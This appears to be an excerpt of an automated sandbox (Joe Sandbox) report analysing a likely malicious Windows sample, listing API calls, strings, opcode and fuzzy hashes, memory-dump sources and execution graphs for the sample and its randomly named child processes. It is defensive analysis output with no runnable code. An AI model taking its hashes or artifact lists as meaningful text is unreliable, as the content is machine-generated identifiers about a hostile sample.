                                                                                                                                  • Instruction Fuzzy Hash: 35414472900209AFCF15DFA8D881FEEBBB5FF08305F188059F909A6261D235EA51DB91
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A7406
                                                                                                                                    • Part of subcall function 008A3BBA: __EH_prolog.LIBCMT ref: 008A3BBF
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008A74CD
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                  • API String ID: 3813983858-639343689
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BAD98
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008BADAD
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008BADC2
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                                  • API String ID: 445417207-3402441367
                                                                                                                                  APIs
                                                                                                                                  • __fprintf_l.LIBCMT ref: 008AD954
                                                                                                                                  • _strncpy.LIBCMT ref: 008AD99A
                                                                                                                                    • Part of subcall function 008B1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008E1030,00000200,008AD928,00000000,?,00000050,008E1030), ref: 008B1DC4
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                  • String ID: $%s$@%s
                                                                                                                                  • API String ID: 562999700-834177443
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E85
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E8F
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E9F
                                                                                                                                  Strings
                                                                                                                                  • Thread pool initialization failed., xrefs: 008B0EB7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BB2BE
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008BB2D6
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 008BB304
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                  • API String ID: 445417207-3292211884
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                  • API String ID: 0-56093855
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,008A7F69,?,?,?), ref: 008AA3FA
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,008A7F69,?), ref: 008AA43E
                                                                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,008A7F69,?,?,?,?,?,?,?), ref: 008AA4BF
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,008A7F69,?,?,?,?,?,?,?,?,?,?), ref: 008AA4C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2287278272-0
                                                                                                                                  • Opcode ID: 1c26c3d3b014892224dca3f09c006e94a61694710d19add8f1cf74ac0fdf0558
                                                                                                                                  • Instruction ID: 6d6a795b7f9eeefd70a09d0fb1fa74e86b3bd06d83d29dea598b5d8744fd1704
                                                                                                                                  • Opcode Fuzzy Hash: 1c26c3d3b014892224dca3f09c006e94a61694710d19add8f1cf74ac0fdf0558
                                                                                                                                  • Instruction Fuzzy Hash: C041CF302483819AEB35DF24DC55BEEBBE4FB8A700F040919B5D1D3A81D7A49A48DB53
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                  • Opcode ID: f99b134d03be5bf961fab457010edbad7878866196ba8d98a70439985968a1f6
                                                                                                                                  • Instruction ID: 5ba0d0a45863d6b0ea4f968e1ae8ac256b6b4fea6a81045b8a9441af1e91b35e
                                                                                                                                  • Opcode Fuzzy Hash: f99b134d03be5bf961fab457010edbad7878866196ba8d98a70439985968a1f6
                                                                                                                                  • Instruction Fuzzy Hash: 754180719016699BDB21DF688C4AAEFBBBCFF01310F004129F945F7256DA30EE458BA5
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008C91E0,?,00000000,?,00000001,?,?,00000001,008C91E0,?), ref: 008CC9D5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008CCA5E
                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008C6CBE,?), ref: 008CCA70
                                                                                                                                  • __freea.LIBCMT ref: 008CCA79
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                  • Opcode ID: def028b912ef4b1115aaf0dfa682b4cda12d9d9a0aa47cccad01ca5040a24422
                                                                                                                                  • Instruction ID: 4f54cb8d1d24fe0d0dbaafd836e023e6a9c75e3a4bff3b2d12a9d272c2af530d
                                                                                                                                  • Opcode Fuzzy Hash: def028b912ef4b1115aaf0dfa682b4cda12d9d9a0aa47cccad01ca5040a24422
                                                                                                                                  • Instruction Fuzzy Hash: CE31ADB2A0021AABDF25DF69DC55EAE7BB5FB01310B04422DFC08E6251EB35CD50CB91
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 008BA666
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 008BA675
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008BA683
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 008BA691
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                  • Opcode ID: ba84e96a52a17bfb6c57fc0d6040fb1629d812b8e2e561fb699adb96602cc9a7
                                                                                                                                  • Instruction ID: 899329c03bd36d9f235889c4f51c3323815a5150bac5c50120f541277fa1f4bb
                                                                                                                                  • Opcode Fuzzy Hash: ba84e96a52a17bfb6c57fc0d6040fb1629d812b8e2e561fb699adb96602cc9a7
                                                                                                                                  • Instruction Fuzzy Hash: 4FE0EC71967721EFD2615B60AC4DB9B3E68FF15B52F018101FA09AA1D0DB6486009BE5
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008BA699: GetDC.USER32(00000000), ref: 008BA69D
                                                                                                                                    • Part of subcall function 008BA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008BA6A8
                                                                                                                                    • Part of subcall function 008BA699: ReleaseDC.USER32(00000000,00000000), ref: 008BA6B3
                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 008BA83C
                                                                                                                                    • Part of subcall function 008BAAC9: GetDC.USER32(00000000), ref: 008BAAD2
                                                                                                                                    • Part of subcall function 008BAAC9: GetObjectW.GDI32(?,00000018,?), ref: 008BAB01
                                                                                                                                    • Part of subcall function 008BAAC9: ReleaseDC.USER32(00000000,?), ref: 008BAB99
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 1061551593-3887548279
                                                                                                                                  • Opcode ID: 65da578e377d1c68f07dad2fefb4f8fdda8a9e17e6ed7118abaae5b939a55437
                                                                                                                                  • Instruction ID: 67ab94779d7fe177f79a45977a7aa08ea6c1dc1267babbc2f0477ac1c97beb1a
                                                                                                                                  • Opcode Fuzzy Hash: 65da578e377d1c68f07dad2fefb4f8fdda8a9e17e6ed7118abaae5b939a55437
                                                                                                                                  • Instruction Fuzzy Hash: 8791EFB1608355AFD614DF25C844A6BBBF9FFC9701F00491EF99AD3220DB30A945CB62
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A75E3
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008AA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A777F
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 3226429890-336475711
                                                                                                                                  • Opcode ID: 66e646a734b93145984680e0a79cebcd128972f422078e738b72cfc99066c5e5
                                                                                                                                  • Instruction ID: a7aca7cda8b55efffabd894a91bb90dcc531f5ca7229a39d86d3b1125778138f
                                                                                                                                  • Opcode Fuzzy Hash: 66e646a734b93145984680e0a79cebcd128972f422078e738b72cfc99066c5e5
                                                                                                                                  • Instruction Fuzzy Hash: 5E419071804558A9FB35EB68CC56EEEB378FF52300F0040A6B605E2592DB745F84DF62
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: }
                                                                                                                                  • API String ID: 176396367-4239843852
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008AF2E4
                                                                                                                                    • Part of subcall function 008AF2C5: GetProcAddress.KERNEL32(008E81C8,CryptUnprotectMemory), ref: 008AF2F4
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,008AF33E), ref: 008AF3D2
                                                                                                                                  Strings
                                                                                                                                  • CryptUnprotectMemory failed, xrefs: 008AF3CA
                                                                                                                                  • CryptProtectMemory failed, xrefs: 008AF389
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                  • API String ID: 2190909847-396321323
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008AB9B8
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __vswprintf_c_l_swprintf
                                                                                                                                  • String ID: %c:\
                                                                                                                                  • API String ID: 1543624204-3142399695
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00010000,008B1160,?,00000000,00000000), ref: 008B1043
                                                                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 008B108A
                                                                                                                                    • Part of subcall function 008A6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A6C54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                  • String ID: CreateThread failed
                                                                                                                                  • API String ID: 2655393344-3849766595
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AE2E8: _swprintf.LIBCMT ref: 008AE30E
                                                                                                                                    • Part of subcall function 008AE2E8: _strlen.LIBCMT ref: 008AE32F
                                                                                                                                    • Part of subcall function 008AE2E8: SetDlgItemTextW.USER32(?,008DE274,?), ref: 008AE38F
                                                                                                                                    • Part of subcall function 008AE2E8: GetWindowRect.USER32(?,?), ref: 008AE3C9
                                                                                                                                    • Part of subcall function 008AE2E8: GetClientRect.USER32(?,?), ref: 008AE3D5
                                                                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                  • SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2622349952-4108050209
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,008B1206,?), ref: 008B0FEA
                                                                                                                                  • GetLastError.KERNEL32(?), ref: 008B0FF6
                                                                                                                                    • Part of subcall function 008A6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A6C54
                                                                                                                                  Strings
                                                                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008B0FFF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                  • API String ID: 1091760877-2248577382
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,008ADA55,?), ref: 008AE2A3
                                                                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,008ADA55,?), ref: 008AE2B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                  • String ID: RTL
                                                                                                                                  • API String ID: 3537982541-834975271

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:7.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:3
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 9581 7ffd9bebac12 9582 7ffd9bebbf60 QueryFullProcessImageNameA 9581->9582 9584 7ffd9bebc104 9582->9584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1938702450.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bc20000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-3993045852
                                                                                                                                  • Opcode ID: 2cc9bee185c2e016b357c8ad6f5bdab4352bf47b9faab179b21e0143d6508e81
                                                                                                                                  • Instruction ID: 284afa97eeb41bcba8b957d6f9270e7d9dce66a97cd4bcdca635406cdc0ea1ae
                                                                                                                                  • Opcode Fuzzy Hash: 2cc9bee185c2e016b357c8ad6f5bdab4352bf47b9faab179b21e0143d6508e81
                                                                                                                                  • Instruction Fuzzy Hash: 75D29371A1DA594FDB98EB58C8A5EA4B7E1FF68750F0442F9E04CD3292CA34BD84CB41

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1940847278.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9beb0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FullImageNameProcessQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3578328331-0
                                                                                                                                  • Opcode ID: 84672be7ac1991af49d00b15fda6a137b54d37f0425b37f0f3ac6218067c5fc9
                                                                                                                                  • Instruction ID: 0ea4c84a083f728db3cd3f428c0d2c4f8a5d529fccfa56a005a34992ea9674b4
                                                                                                                                  • Opcode Fuzzy Hash: 84672be7ac1991af49d00b15fda6a137b54d37f0425b37f0f3ac6218067c5fc9
                                                                                                                                  • Instruction Fuzzy Hash: 2D717030618A4D8FEB68DF68C8557F937E1FB59311F10423EE84EC72A2CB75A9418B81
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.1936788356.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bac0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9$#{9
                                                                                                                                  • API String ID: 0-1692736845
                                                                                                                                  • Opcode ID: 2560d99f7aadee0768160d3826f84225cd5e3117e9cca7b1c82e99ed3d0c3aa1
                                                                                                                                  • Instruction ID: 962e4899e7d570850169bb59c106cc96c19b9b119790d2ccf6a32686fe76ecc3
                                                                                                                                  • Opcode Fuzzy Hash: 2560d99f7aadee0768160d3826f84225cd5e3117e9cca7b1c82e99ed3d0c3aa1
                                                                                                                                  • Instruction Fuzzy Hash: CC514C06B1A46A45E33977FD78219FD6B449FA923FB0843B7F85E8D0D74C486085C2E9
                                                                                                                                  • Opcode Fuzzy Hash: 79684dcb15c81abbd261c74f96577f68160e24152653c44a064c05e2e0320699
                                                                                                                                  • Instruction Fuzzy Hash: 1F41C132B09A1D4FEB64EB58D8A4AE973E2EB98320F05427BD40DC72D5DE786945C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a38f0f56ea82cc10b5420843e6f5aeab71a6999403b7f326bba4df93bf2997c8
                                                                                                                                  • Instruction ID: dcede70c81ed9e9555598476dfda89c2b1f0810f152eddbeda229ee1dc04cb54
                                                                                                                                  • Opcode Fuzzy Hash: a38f0f56ea82cc10b5420843e6f5aeab71a6999403b7f326bba4df93bf2997c8
                                                                                                                                  • Instruction Fuzzy Hash: F8313936B0E24D8EE731EBA888611EC7B61EF41725F0641B7D05CCB1D3D9782689C765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5ba8d23f3a285f1ec139348e86858482c11d10aa14a38592c3c6d00d7695778b
                                                                                                                                  • Instruction ID: 925ee1c982671daf55532d4d5121612ae63939c7403ef06d5f6190a24fbc153d
                                                                                                                                  • Opcode Fuzzy Hash: 5ba8d23f3a285f1ec139348e86858482c11d10aa14a38592c3c6d00d7695778b
                                                                                                                                  • Instruction Fuzzy Hash: 6E21F620B1991D0FE7A8F76C986AA7972C3EF9C325F4140BEE40EC32E7DD54AC418295
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53cb363bd71b351f5864b0dc12745a4495376562cc90c4be70a4716cd29d070b
                                                                                                                                  • Instruction ID: 85cd109f00dcd8ade8b37935cfa4be4649a57ae20b4f8559171ad2c7ab42758c
                                                                                                                                  • Opcode Fuzzy Hash: 53cb363bd71b351f5864b0dc12745a4495376562cc90c4be70a4716cd29d070b
                                                                                                                                  • Instruction Fuzzy Hash: 81113F31F0DA4D0FCB99E76C58650B47BD1EFD9210F4901BBD44DC31A2ED699D468341
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction ID: dfbcc0dc2d70896cd87b121984961216c8990e403d431e32b97dc875d70e4324
